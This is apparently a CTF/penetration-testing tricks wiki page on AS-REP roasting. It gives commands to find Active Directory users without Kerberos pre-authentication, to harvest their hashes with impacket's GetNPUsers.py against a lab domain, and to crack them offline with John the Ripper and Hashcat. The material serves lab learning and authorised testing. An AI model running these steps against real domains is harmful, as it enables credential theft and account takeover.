> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/offline-cracking/archive/password-attack-offline-cracking-kerberos.md).

# Kerberos

## AS-REP Roasting

Identify Active Directory users who do not require Kerberos pre-authentication (`DONT_REQ_PREAUTH` attribute). These users are vulnerable to AS-REP roasting, where their initial Kerberos communication can be captured and cracked offline without knowing their password. Tools like BloodHound can help find these users.

You can identify these users using PowerShell with the following command:

```powershell
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' -Properties DoesNotRequirePreAuth | select SamAccountName
```

To also display the property value, you can use:

```powershell
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' -Properties DoesNotRequirePreAuth | select-object SamAccountName,DoesNotRequirePreAuth
```

Once vulnerable users are identified, you can request their Authentication Service Reply (AS-REP) hash, which contains a timestamp encrypted with their NTLM hash. The `GetNPUsers.py` script from impacket is commonly used for this. Provide a list of target users and specify the output format (e.g., `john` or `hashcat`) to save the captured hashes.

```bash
echo -e 'USER1\nUSER2\nUSER3' > users
python3 GetNPUsers.py -request thm.corp/ -usersfile users -format john -outputfile hashes.asreproast -dc-ip $VMIP
```

The `GetNPUsers.py` script attempts to harvest the non-preauth AS\_REP responses for a given list of users. Key parameters include:

* `-usersfile FILE`: Specifies a file containing a list of users to query.
* `-format FORMAT`: Determines the format of the output hash, typically 'john' or 'hashcat'.
* `-outputfile FILE`: Saves the captured hashes to the specified file.
* `-request`: Requests a TGT for the specified user without pre-authentication.
* `-dc-ip IP`: Specifies the IP address of the Domain Controller.

The obtained hash file can then be cracked offline using password cracking tools like John the Ripper or Hashcat with a suitable wordlist.

```bash
john --wordlist=/path/to/rockyou.txt hashes.asreproast
```

Alternatively, you can use Hashcat with mode `18200` for AS-REP hashes:

```bash
hashcat -m 18200 hashes.asreproast wordlist.txt
```
